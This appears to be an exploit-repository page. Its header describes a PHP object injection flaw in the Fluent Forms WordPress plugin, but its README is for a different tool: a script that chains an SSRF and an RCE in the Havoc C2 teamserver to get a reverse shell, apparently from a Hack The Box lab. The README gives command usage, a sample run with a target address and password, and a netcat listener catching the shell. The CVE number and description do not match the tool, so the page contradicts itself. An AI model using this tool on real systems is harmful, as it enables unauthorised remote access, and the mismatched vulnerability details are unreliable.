
CVE-2024-4157 PoC — Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.15 - PHP Object Injection via extractDynamicValues

Associated Vulnerability
Title: Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.15 - PHP Object Injection via extractDynamicValues (CVE-2024-4157)
Description: The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.1.15 via deserialization of untrusted input in the extractDynamicValues function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. Successful exploitation requires the attacker to have "View Form" and "Manage Form" permissions, which must be explicitly set by an administrator. However, this requirement can be bypassed when this vulnerability is chained with CVE-2024-2771.
Description
Chaining the Havoc C2 SSRF with the RCE to get a reverse shell on a Havoc C2 server.
Readme
# CVE-2024-4157: Getting a Reverse Shell on Havoc C2 - Chaining SSRF with RCE
Get a reverse shell to a local IP and port by chaining the [CVE-2024-4157 POC](https://github.com/chebuya/Havoc-C2-SSRF-poc) with [havoc_auth_rce](https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce).

## Usage
- Basic info
```bash
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target URL where the C2 server is running
## -i: internal IP address that we want the C2 server to interact with (SSRF)
## -p: internal port
## -U: username for the C2 server
## -P: password for the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell
```
- Example
```bash
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
```
- Reverse shell on our `nc` listener
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 
```

## Credit

- Credit to [@chebuya](https://github.com/chebuya/Havoc-C2-SSRF-poc) for the SSRF, [detailed blog on the vulnerability](https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/)
- Credit to [@Laurence Tennant](https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce) for the RCE, [detailed info on blog](https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/)
- Credit to [0xdf](https://0xdf.gitlab.io/2025/06/07/htb-backfire.html) for the amazing writeup on [HTB Backfire](https://app.hackthebox.com/machines/Backfire)

## Disclaimer
- This tool is for educational and research purposes only
File Snapshot

```text
[4.0K] /data/pocs/614383d697a48546e13163651a9be9819dd01e75
├── [ 12K] exploit.py
└── [2.4K] README.md

0 directories, 2 files
```